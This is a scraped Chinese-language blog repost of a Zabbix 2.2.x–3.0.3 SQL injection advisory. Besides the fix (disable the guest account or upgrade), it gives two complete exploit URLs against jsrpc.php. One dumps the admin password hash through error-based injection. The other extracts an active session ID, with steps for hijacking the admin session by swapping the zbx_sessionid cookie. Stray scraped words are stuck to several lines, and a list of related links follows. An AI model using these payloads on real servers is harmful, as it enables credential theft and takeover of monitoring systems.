Zabbix 2.2.x / 2.4.x/ 3.0.0-3.0.3 - SQL Injection
漏洞来源: http://seclists.org/fulldisclosure/2016/Aug/60php
***成本:低web
危害程度:高
session
利用条件: 须要guest用户权限(未登陆用户都被设定为guest用户的访问权限)ide
影响范围:2.2.x / 2.4.x/ 3.0.0-3.0.3
spa
修复建议: 禁用guest用户或者升级到3.0.43d
漏洞利用:orm
爆密码xml
sanr.com/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and updatexml(1,concat(0x3a,(select passwd from zabbix.users limit 0,1)),1))%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1blog
输出结果,以下表示漏洞存在:图片
输出结果,以下表示禁用guest:
爆sessionid(在密码破解不了状况下 可使用session欺骗)
须要取掉爆出来sessionid前面的数字1,在进行修改zbx_sessionid的值。
sanr.com/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
zabbix具体版号查看
2.x版本
3.x版本
- 1. Apache 2.4.x 对比 2.2.x虚拟主机配置不一样
- 2. Zabbix 3.x 升级到 Zabbix 4.x
- 3. 初入Cocos2d-x 2.2
- 4. cocos2d-x 2.2.x 常问题整理
- 5. SpringBoot 2.2.x 的一些坑
- 6. apache 2.4.x 特殊性
- 7. Cent OS 7.x 安装Zabbix 3.x
- 8. Zabbix 2.4 安装
- 9. Cocos2d-x教程(14)-Cocos2d-x 2.2.x版本 Json解析(初级篇)
- 10. Zabbix-3.0.X 安装Graphtree
- 更多相关文章...
- • SQL ROUND() 函数 - SQL 教程
- • SQL 主机 - SQL 教程
- • 漫谈MySQL的锁机制
- • Composer 安装与使用
-
每一个你不满意的现在,都有一个你没有努力的曾经。